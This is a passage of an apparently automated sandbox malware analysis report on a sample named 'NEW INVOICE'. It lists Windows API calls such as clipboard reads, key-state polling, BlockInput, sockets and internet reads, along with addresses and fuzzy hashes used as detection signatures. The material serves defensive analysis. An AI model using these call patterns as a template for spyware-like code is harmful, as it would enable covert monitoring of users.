                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: Find$File$CloseFirstNextSleep_wcslen
                                                                                    • String ID: *.*
                                                                                    • API String ID: 2693929171-438819550
                                                                                    • Opcode ID: 17936c38af85c1dbfc3d1ebbd0b26446ca2a596e07a4ad84d79ac0689e190811
                                                                                    • Instruction ID: e6452ff64139cddd5fd774ab19bf2199aa97b2a19dc0f7115334900b47d689b2
                                                                                    • Opcode Fuzzy Hash: 17936c38af85c1dbfc3d1ebbd0b26446ca2a596e07a4ad84d79ac0689e190811
                                                                                    • Instruction Fuzzy Hash: BD419D756083409FC314DF25C984A9FB7E4BF86305F04491FF98993291DBB8E949CB5A
                                                                                    APIs
                                                                                    • OpenClipboard.USER32(?), ref: 0046C635
                                                                                    • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046C643
                                                                                    • GetClipboardData.USER32(0000000D), ref: 0046C64F
                                                                                    • CloseClipboard.USER32 ref: 0046C65D
                                                                                    • GlobalLock.KERNEL32(00000000), ref: 0046C688
                                                                                    • CloseClipboard.USER32 ref: 0046C692
                                                                                    • IsClipboardFormatAvailable.USER32(00000001), ref: 0046C6D5
                                                                                    • GetClipboardData.USER32(00000001), ref: 0046C6DD
                                                                                    • GlobalLock.KERNEL32(00000000), ref: 0046C6EE
                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0046C726
                                                                                    • CloseClipboard.USER32 ref: 0046C866
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: Clipboard$CloseGlobal$AvailableDataFormatLock$OpenUnlock
                                                                                    • String ID: HH
                                                                                    • API String ID: 589737431-2761332787
                                                                                    • Opcode ID: 76419e0badb028214ed7bad9e924c36871e80023f9f647d131bfc03e45e064d3
                                                                                    • Instruction ID: 5556deb4c8197336e1b92b5e2a85e957832ef7964462d916cb468ff193882e13
                                                                                    • Opcode Fuzzy Hash: 76419e0badb028214ed7bad9e924c36871e80023f9f647d131bfc03e45e064d3
                                                                                    • Instruction Fuzzy Hash: 7301F5762042005FC300AFB9ED45B6A7BA4EF59704F04097FF980A72C1EBB1E915C7AA
                                                                                    APIs
                                                                                    • __wcsicoll.LIBCMT ref: 0043643C
                                                                                    • mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 00436452
                                                                                    • __wcsicoll.LIBCMT ref: 00436466
                                                                                    • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0043647C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: __wcsicollmouse_event
                                                                                    • String ID: DOWN
                                                                                    • API String ID: 1033544147-711622031
                                                                                    • Opcode ID: 8e71a22f1bb6dc727f393f419cee3c46fab46d9365d91d475c80ba63e0095046
                                                                                    • Instruction ID: 8a73d33e481528181e274ae5662561dddcd8f7088196b39fde8242b6fe69d79f
                                                                                    • Opcode Fuzzy Hash: 8e71a22f1bb6dc727f393f419cee3c46fab46d9365d91d475c80ba63e0095046
                                                                                    • Instruction Fuzzy Hash: 75E0927558872039FC4036253C02FFB174CAB66796F018116FE00D1291EA586D865BBD
                                                                                    APIs
                                                                                      • Part of subcall function 004647A2: inet_addr.WSOCK32(?), ref: 004647C7
                                                                                    • socket.WSOCK32(00000002,00000002,00000011,?,00000000), ref: 00474213
                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00474233
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLastinet_addrsocket
                                                                                    • String ID:
                                                                                    • API String ID: 4170576061-0
                                                                                    • Opcode ID: c11ce247c64ee683b380b6a697379cd3ea863651eb179087c325b129d43524e0
                                                                                    • Instruction ID: 44a7e99483396e6262e636993c5e510db402c36a24f0b6146f21617b09e75fab
                                                                                    • Opcode Fuzzy Hash: c11ce247c64ee683b380b6a697379cd3ea863651eb179087c325b129d43524e0
                                                                                    • Instruction Fuzzy Hash: B6412C7164030067E720BB3A8C83F5A72D89F40728F144D5EF954BB2C3D6BAAD45475D
                                                                                    APIs
                                                                                    • GetCursorPos.USER32(004A83D8), ref: 0045636A
                                                                                    • ScreenToClient.USER32(004A83D8,?), ref: 0045638A
                                                                                    • GetAsyncKeyState.USER32(?), ref: 004563D0
                                                                                    • GetAsyncKeyState.USER32(?), ref: 004563DC
                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00456430
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: AsyncState$ClientCursorLongScreenWindow
                                                                                    • String ID:
                                                                                    • API String ID: 3539004672-0
                                                                                    • Opcode ID: 8b6f1a7d11e91e3692d621cb91ecba55955a7a9a0de246f0cd2a62484a80ce0b
                                                                                    • Instruction ID: 0eacbf52c9ff4b21db6d2500407d28a57be55752a0539e191fb639d8ee6a043b
                                                                                    • Opcode Fuzzy Hash: 8b6f1a7d11e91e3692d621cb91ecba55955a7a9a0de246f0cd2a62484a80ce0b
                                                                                    • Instruction Fuzzy Hash: 8E416071108341ABD724DF55CD84EBBB7E9EF86725F540B0EB8A543281C734A848CB6A
                                                                                    APIs
                                                                                      • Part of subcall function 0046DD22: IsWindow.USER32(00000000), ref: 0046DD51
                                                                                    • IsWindowVisible.USER32 ref: 00477314
                                                                                    • IsWindowEnabled.USER32 ref: 00477324
                                                                                    • GetForegroundWindow.USER32(?,?,?,00000001,?,?), ref: 00477331
                                                                                    • IsIconic.USER32 ref: 0047733F
                                                                                    • IsZoomed.USER32 ref: 0047734D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                    • String ID:
                                                                                    • API String ID: 292994002-0
                                                                                    • Opcode ID: 1c24098bd8cb9da3f496229370c910df04dc27541171caa4f2956f9c30b83eee
                                                                                    • Instruction ID: c753cb395bd8887e5e04db90522a3107d7308fd2cfa588f53a4db7a4177bc043
                                                                                    • Opcode Fuzzy Hash: 1c24098bd8cb9da3f496229370c910df04dc27541171caa4f2956f9c30b83eee
                                                                                    • Instruction Fuzzy Hash: 351172327041119BE3209B26DD05B9FB7A8AF91310F05882EFC49E7250D7B8EC42D7A9
                                                                                    APIs
                                                                                    • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000,75923220,00000000,00000000,00442E95,?,?,?), ref: 00436D4F
                                                                                    • SetFileTime.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000), ref: 00436D8C
                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,00000000), ref: 00436D93
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$CloseCreateHandleTime
                                                                                    • String ID:
                                                                                    • API String ID: 3397143404-0
                                                                                    • Opcode ID: 17e11168520f802dddbe8c477e19047108492bf153e6cd976562f268bfda3e60
                                                                                    • Instruction ID: bce1a9391340f9688fe0750810cd2cb1b104417d8b3c1e96578cdf6de8724fbd
                                                                                    • Opcode Fuzzy Hash: 17e11168520f802dddbe8c477e19047108492bf153e6cd976562f268bfda3e60
                                                                                    • Instruction Fuzzy Hash: A4F0C83634132077E5301A69AC8DFCF276CABDAB32F20452EF741A61C083D51445977D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: ERCP$VUUU$VUUU$VUUU
                                                                                    • API String ID: 0-2165971703
                                                                                    • Opcode ID: fe5f619ecbbb89e409f3ebcf557090f4afc22d0cdf4dbad8df8e547bb5c0b5b7
                                                                                    • Instruction ID: 514654dd073cfe12bfc68f6c44a091d7a3824994b709b832431b3f3de6bbd106
                                                                                    • Opcode Fuzzy Hash: fe5f619ecbbb89e409f3ebcf557090f4afc22d0cdf4dbad8df8e547bb5c0b5b7
                                                                                    • Instruction Fuzzy Hash: 5562D3716087818BE734CF18C8807ABB7E1EBC6314F154A2FE49986390E779D949CB5B
                                                                                    APIs
                                                                                    • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045C9BE
                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 0045CA1B
                                                                                    • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CA4A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: Find$File$CloseFirstNext
                                                                                    • String ID:
                                                                                    • API String ID: 3541575487-0
                                                                                    • Opcode ID: cd42767256c3935660832567e39f7af9e021373ba4cf75ddba00705dd7020de4
                                                                                    • Instruction ID: 18858b47483a38653cd59612877c1399ad483e9f26b014a4aa46912757e3bc7b
                                                                                    • Opcode Fuzzy Hash: cd42767256c3935660832567e39f7af9e021373ba4cf75ddba00705dd7020de4
                                                                                    • Instruction Fuzzy Hash: EC41CE756003009FC720EF79D880A9BB3E4FF89315F208A6EED698B391D775A844CB95
                                                                                    APIs
                                                                                    • GetFileAttributesW.KERNEL32(00000001,00000000), ref: 00436AEF
                                                                                    • FindFirstFileW.KERNEL32(00000001,?), ref: 00436B00
                                                                                    • FindClose.KERNEL32(00000000), ref: 00436B13
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileFind$AttributesCloseFirst
                                                                                    • String ID:
                                                                                    • API String ID: 48322524-0
                                                                                    • Opcode ID: 9dc85b775151a348b3ed896f2b5842869c214baa03f23a1e311506cc1954de59
                                                                                    • Instruction ID: 417b6d6de692ea6945bae3bf725251b28653fd5bce93257cef0f58e2a105c1b1
                                                                                    • Opcode Fuzzy Hash: 9dc85b775151a348b3ed896f2b5842869c214baa03f23a1e311506cc1954de59
                                                                                    • Instruction Fuzzy Hash: 23E02236804418678600AB7CAC0C4EE779CDB0A335F100B96FE38C21D0D775A9408FEA
                                                                                    APIs
                                                                                    • __time64.LIBCMT ref: 004433A2
                                                                                      • Part of subcall function 00414CEF: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,004341DB,00000000,?,0044248A,?,?,?,0048B850), ref: 00414CFA
                                                                                      • Part of subcall function 00414CEF: __aulldiv.LIBCMT ref: 00414D1A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: Time$FileSystem__aulldiv__time64
                                                                                    • String ID: rJ
                                                                                    • API String ID: 2893107130-1865492326
                                                                                    • Opcode ID: e603e75d0767fd135478995c8e8d26e9f594f0c4df67822259ddb38eb763753e
                                                                                    • Instruction ID: ebc1a5536eae3429eadb0b33e849de59894c076497330b79c1ff8485d89898ec
                                                                                    • Opcode Fuzzy Hash: e603e75d0767fd135478995c8e8d26e9f594f0c4df67822259ddb38eb763753e
                                                                                    • Instruction Fuzzy Hash: B721A2336205108BF321CF36CC41652B7E7EBE0314F268A6AE4A5973C5CA797906CB98
                                                                                    APIs
                                                                                    • __time64.LIBCMT ref: 004433A2
                                                                                      • Part of subcall function 00414CEF: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,004341DB,00000000,?,0044248A,?,?,?,0048B850), ref: 00414CFA
                                                                                      • Part of subcall function 00414CEF: __aulldiv.LIBCMT ref: 00414D1A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: Time$FileSystem__aulldiv__time64
                                                                                    • String ID: rJ
                                                                                    • API String ID: 2893107130-1865492326
                                                                                    • Opcode ID: e8e365b2ab883cc854990c78a2143569adcb81f7322f31e235de15ec19987b7e
                                                                                    • Instruction ID: 4b4e0c3debee0a45c2bc781276f994e79ac96c452fb6cf924f1e6ade5adf298d
                                                                                    • Opcode Fuzzy Hash: e8e365b2ab883cc854990c78a2143569adcb81f7322f31e235de15ec19987b7e
                                                                                    • Instruction Fuzzy Hash: E82187336345108BF321CF36CC4165277E3EBE0314B258B6AD4A5973C5CA797906CB88
                                                                                    APIs
                                                                                    • InternetQueryDataAvailable.WININET(?,?,?,?,00000000,00000000), ref: 004428C2
                                                                                    • InternetReadFile.WININET(?,00000000,?,?), ref: 004428F9
                                                                                      • Part of subcall function 0044286A: GetLastError.KERNEL32(00000000,0044AA07,?,00000000,00000000,00000001,?,?), ref: 00442880
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: Internet$AvailableDataErrorFileLastQueryRead
                                                                                    • String ID:
                                                                                    • API String ID: 901099227-0
                                                                                    • Opcode ID: 0771251b70b9bd68c35fac6f7da5b5f16004994504cb59d35d549d3fc14a9ba4
                                                                                    • Instruction ID: 2c15810e60b1cb59304632cc8162977c32d0240baa2dcf3c2cd6ef22f942a6bb
                                                                                    • Opcode Fuzzy Hash: 0771251b70b9bd68c35fac6f7da5b5f16004994504cb59d35d549d3fc14a9ba4
                                                                                    • Instruction Fuzzy Hash: 452174B12043016BF220EF56DD45FAFB3E8ABD4715F40492EF285A6180D7B8E949C76A
                                                                                    APIs
                                                                                    • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045DDA1
                                                                                    • FindClose.KERNEL32(00000000), ref: 0045DDDD
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: Find$CloseFileFirst
                                                                                    • String ID:
                                                                                    • API String ID: 2295610775-0
                                                                                    • Opcode ID: eac1d012b3ae473636f11b903683455954ec17c127a785734040b224e9a5f79e
                                                                                    • Instruction ID: 3577cc1601137e614a3334ffa73c6d258275d41fe8d72aaca367a27ef3e2a016
                                                                                    • Opcode Fuzzy Hash: eac1d012b3ae473636f11b903683455954ec17c127a785734040b224e9a5f79e
                                                                                    • Instruction Fuzzy Hash: DE11E5766002049FD710EF6ADC89A5AF7E5EF84325F10892EF958D7281CB75E8048B94
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 0vH$HH
                                                                                    • API String ID: 0-728391547
                                                                                    • Opcode ID: 96d535d6e61c6cd6e5d21badf476ce2a2faa32e114d6f0ae27a3d334794412dd
                                                                                    • Instruction ID: 538a6706abcc28c04bdc151be30d2aa4e2083a8dfdfa6c30a7857f36827e6882
                                                                                    • Opcode Fuzzy Hash: 96d535d6e61c6cd6e5d21badf476ce2a2faa32e114d6f0ae27a3d334794412dd
                                                                                    • Instruction Fuzzy Hash: 60E1BE725143109FC310EF25C881A9FB7E5AFC4708F108D2EF589AB281D779E946CB9A
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: _memset
                                                                                    • String ID:
                                                                                    • API String ID: 2102423945-0
                                                                                    • Opcode ID: b8def19716de174921965326585c8a0a0c2eba4d3f226f62ebfac136bfb84777
                                                                                    • Instruction ID: fac722ae1e10b3ad9494cda40f9fb3e9e62b3c26aea04ddfc6562ea9d2065ebb
                                                                                    • Opcode Fuzzy Hash: b8def19716de174921965326585c8a0a0c2eba4d3f226f62ebfac136bfb84777
                                                                                    • Instruction Fuzzy Hash: C512B4B7B983194FDB48DEE4DCC169573E1FB98304F09A43C9A15C7306F6E8AA094794
                                                                                    APIs
                                                                                    • DefDlgProcW.USER32(?,?,?,?,004A83D8,?), ref: 0047E22C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: Proc
                                                                                    • String ID:
                                                                                    • API String ID: 2346855178-0
                                                                                    • Opcode ID: 4f476b527310cd4595d6f2246be334f82b87c4d4a511bc9a4ae10ad49a3a576c
                                                                                    • Instruction ID: e1c03c818efbd3cbf3664a0c3e659178dbc9a05004c0f073233894ce1d713c90
                                                                                    • Opcode Fuzzy Hash: 4f476b527310cd4595d6f2246be334f82b87c4d4a511bc9a4ae10ad49a3a576c
                                                                                    • Instruction Fuzzy Hash: 4EB1E63330602429E114916BBC88EBFBB9CD7D677BB208B7FF142C1582DB5B6425A179
                                                                                    APIs
                                                                                    • BlockInput.USER32(00000001), ref: 0045A272
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
